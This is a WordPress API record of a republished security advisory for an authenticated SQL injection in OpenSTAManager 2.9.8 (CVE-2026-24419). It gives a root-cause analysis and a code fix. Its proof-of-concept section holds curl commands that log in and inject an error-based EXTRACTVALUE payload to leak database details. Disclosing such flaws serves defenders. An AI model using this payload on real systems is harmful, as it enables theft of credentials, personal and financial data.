{"id":46302,"date":"2026-04-13T11:50:31","date_gmt":"2026-04-13T11:50:31","guid":{"rendered":"http:\/\/localhost\/?p=46302"},"modified":"2026-04-13T11:50:31","modified_gmt":"2026-04-13T11:50:31","slug":"openstamanager-298-sql-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=46302","title":{"rendered":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218738"},"content":{"rendered":"

{“lastseen”:”2026-04-13T15:52:16″,”description”:”OpenSTAManager versions 2.9.8 and below suffer from a remote SQL injection vulnerability in the Prima Nota module…”,”published”:”2026-04-13T00:00:00″,”modified”:”2026-04-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:218738″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-24419″],”sourceData”:”# CVE-2026-24419: OpenSTAManager has a SQL Injection in the Prima Nota module \\n \\n ## Overview\\n \\n | Field | Details |\\n |—|—|\\n | **CVE ID** | [CVE-2026-24419](https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-24419) |\\n | **Severity** | HIGH |\\n | **Advisory** | [View Advisory](https:\/\/github.com\/devcode-it\/openstamanager\/security\/advisories\/GHSA-4j2x-jh4m-fqv6) |\\n | **Discovered by** | [Lukasz Rybak](https:\/\/github.com\/lukasz-rybak) |\\n \\n ## Affected Products\\n \\n – **devcode-it\/openstamanager** (versions: \\u003c= 2.9.8)\\n \\n \\n ## CWE Classification\\n \\n – CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)\\n \\n ## Details\\n \\n ### Summary\\n \\n Critical Error-Based SQL Injection vulnerability in the Prima Nota (Journal Entry) module of OpenSTAManager v2.9.8 allows authenticated attackers to extract complete database contents including user credentials, customer PII, and financial records through XML error messages by injecting malicious SQL into URL parameters.\\n \\n **Status:** \u2705 Confirmed and tested on live instance (v2.9.8)\\n **Vulnerable Parameters:** `id_documenti` (GET parameters)\\n **Affected Endpoint:** `\/modules\/primanota\/add.php`\\n **Attack Type:** Error-Based SQL Injection (IN clause)\\n \\n ### Details\\n \\n OpenSTAManager v2.9.8 contains a critical Error-Based SQL Injection vulnerability in the Prima Nota (Journal Entry) module’s add.php file. The application fails to validate that comma-separated values from GET parameters are integers before using them in SQL IN() clauses, allowing attackers to inject arbitrary SQL commands and extract sensitive data through XPATH error messages.\\n \\n **Vulnerability Chain:**\\n \\n 1. **Entry Point:** `\/modules\/primanota\/add.php` (Lines 63-67)\\n “`php\\n $id_documenti = $id_documenti ?: get(‘id_documenti’);\\n $id_documenti = $id_documenti ? explode(‘,’, (string) $id_documenti) : [];\\n “`\\n **Impact:** The `get()` function retrieves user-controlled URL parameters, `explode(‘,’, (string) …)` splits them by comma, but NO validation ensures elements are integers.\\n \\n 2. **SQL Injection Point:** `\/modules\/primanota\/add.php` (Line 306)\\n “`php\\n $id_anagrafica = $dbo-\\u003efetchOne(‘SELECT idanagrafica FROM co_documenti WHERE id IN(‘.($id_documenti ? implode(‘,’, $id_documenti) : 0).’)’)[‘idanagrafica’];\\n “`\\n **Impact:** Array elements from `$id_documenti` are directly concatenated using `implode()` without type validation or `prepare()`, enabling full SQL injection. \\n \\n \\n **Root Cause Analysis:**\\n \\n The vulnerability exists because:\\n 1. `get(‘id_documenti’)` return user-controlled strings\\n 2. `explode(‘,’, (string) $value)` splits by comma but doesn’t validate types\\n 3. `implode(‘,’, $array)` concatenates array elements directly into SQL\\n 4. No validation ensures array elements are integers\\n 5. Attacker can inject SQL by providing: `?id_documenti=1) AND EXTRACTVALUE(…) %23`\\n \\n **Affected Code Path:**\\n “`\\n GET \/modules\/primanota\/add.php?id_documenti=MALICIOUS_PAYLOAD\\n \u2193\\n add.php:63 – $id_documenti = get(‘id_documenti’)\\n \u2193\\n add.php:64 – $id_documenti = explode(‘,’, (string) $id_documenti) [NO TYPE VALIDATION]\\n \u2193\\n add.php:306 – WHERE id IN(‘.implode(‘,’, $id_documenti).’) [INJECTION POINT]\\n “`\\n \\n ### PoC\\n \\n \\n **Step 1: Login**\\n “`bash\\n curl -c \/tmp\/cookies.txt -X POST ‘http:\/\/localhost:8081\/index.php?op=login’ \\\\\\n -d ‘username=admin\\u0026password=admin’\\n “`\\n \\n **Step 2: Verify Vulnerability (Error-Based SQL Injection)**\\n \\n **Test 1: Extract Database User and Version**\\n “`bash\\n curl -b \/tmp\/cookies.txt \\”http:\/\/localhost:8081\/modules\/primanota\/add.php?id_documenti=1)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20CONCAT(USER(),’%20|%20’,VERSION()))))%23\\”\\n “`\\n \\n **Response (error message visible to attacker):**\\n “`html\\n \\u003ccode\\u003eSQLSTATE[HY000]: General error: 1105 XPATH syntax error: \\u0026#039;~osm@172.18.0.3 | 8.3.0\\u0026#039;\\u003c\/code\\u003e\\n “`\\n \\u003cimg width=\\”1231\\” height=\\”405\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/1657b844-281a-431b-8472-c81e4d90bf64\\” \/\\u003e\\n \\n \\n ### Impact\\n \\n All authenticated users with access to the Prima Nota (Journal Entry) module.\\n \\n \\n ### Recommended Fix\\n \\n **Primary Fix – Type Validation:**\\n \\n File: `\/modules\/primanota\/add.php`\\n \\n **BEFORE (Vulnerable – Lines 63-67):**\\n “`php\\n $id_documenti = $id_documenti ?: get(‘id_documenti’);\\n $id_documenti = $id_documenti ? explode(‘,’, (string) $id_documenti) : [];\\n “`\\n \\n **AFTER (Fixed):**\\n “`php\\n $id_documenti = $id_documenti ?: get(‘id_documenti’);\\n $id_documenti = $id_documenti ? explode(‘,’, (string) $id_documenti) : [];\\n \/\/ Validate that all array elements are integers\\n $id_documenti = array_map(‘intval’, $id_documenti);\\n $id_documenti = array_filter($id_documenti, fn($id) =\\u003e $id \\u003e 0); \/\/ Remove zero\/negative IDs\\n “`\\n \\n ### Credits\\n Discovered by \u0141ukasz Rybak\\n \\n ## References\\n \\n – https:\/\/github.com\/devcode-it\/openstamanager\/security\/advisories\/GHSA-4j2x-jh4m-fqv6\\n – https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-24419\\n – https:\/\/github.com\/advisories\/GHSA-4j2x-jh4m-fqv6\\n \\n \\n ## Disclaimer\\n \\n This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.”,”sourceHref”:”https:\/\/packetstorm.news\/download\/218738″,”cvss”:{“score”:8.7,”severity”:”HIGH”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:L\/UI:N\/VC:H\/SC:N\/VI:H\/SI:N\/VA:H\/SA:N”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/218738\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-04-13T15:52:16″,”description”:”OpenSTAManager versions 2.9.8 and below suffer from a remote SQL injection vulnerability in the Prima Nota module…”,”published”:”2026-04-13T00:00:00″,”modified”:”2026-04-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:218738″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-24419″],”sourceData”:”# CVE-2026-24419: OpenSTAManager has a…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,19,12,15,13,53,7,11,5],"class_list":["post-46302","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-87","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218738 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=46302\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218738 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-04-13T15:52:16″,”description”:”OpenSTAManager versions 2.9.8 and below suffer from a remote SQL injection vulnerability in the Prima Nota module…”,”published”:”2026-04-13T00:00:00″,”modified”:”2026-04-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:218738″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-24419″],”sourceData”:”# CVE-2026-24419: OpenSTAManager has a...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=46302\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-13T11:50:31+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46302#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46302\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218738\",\"datePublished\":\"2026-04-13T11:50:31+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46302\"},\"wordCount\":919,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.7\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=46302#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46302\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46302\",\"name\":\"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218738 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-13T11:50:31+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46302#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=46302\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46302#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218738\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218738 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=46302","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218738 - zero redgem","og_description":"{“lastseen”:”2026-04-13T15:52:16″,”description”:”OpenSTAManager versions 2.9.8 and below suffer from a remote SQL injection vulnerability in the Prima Nota module…”,”published”:”2026-04-13T00:00:00″,”modified”:”2026-04-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:218738″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-24419″],”sourceData”:”# CVE-2026-24419: OpenSTAManager has a...","og_url":"https:\/\/zero.redgem.net\/?p=46302","og_site_name":"zero redgem","article_published_time":"2026-04-13T11:50:31+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=46302#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=46302"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218738","datePublished":"2026-04-13T11:50:31+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=46302"},"wordCount":919,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.7","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=46302#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=46302","url":"https:\/\/zero.redgem.net\/?p=46302","name":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218738 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-13T11:50:31+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=46302#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=46302"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=46302#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218738"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/46302","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=46302"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/46302\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=46302"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=46302"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=46302"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}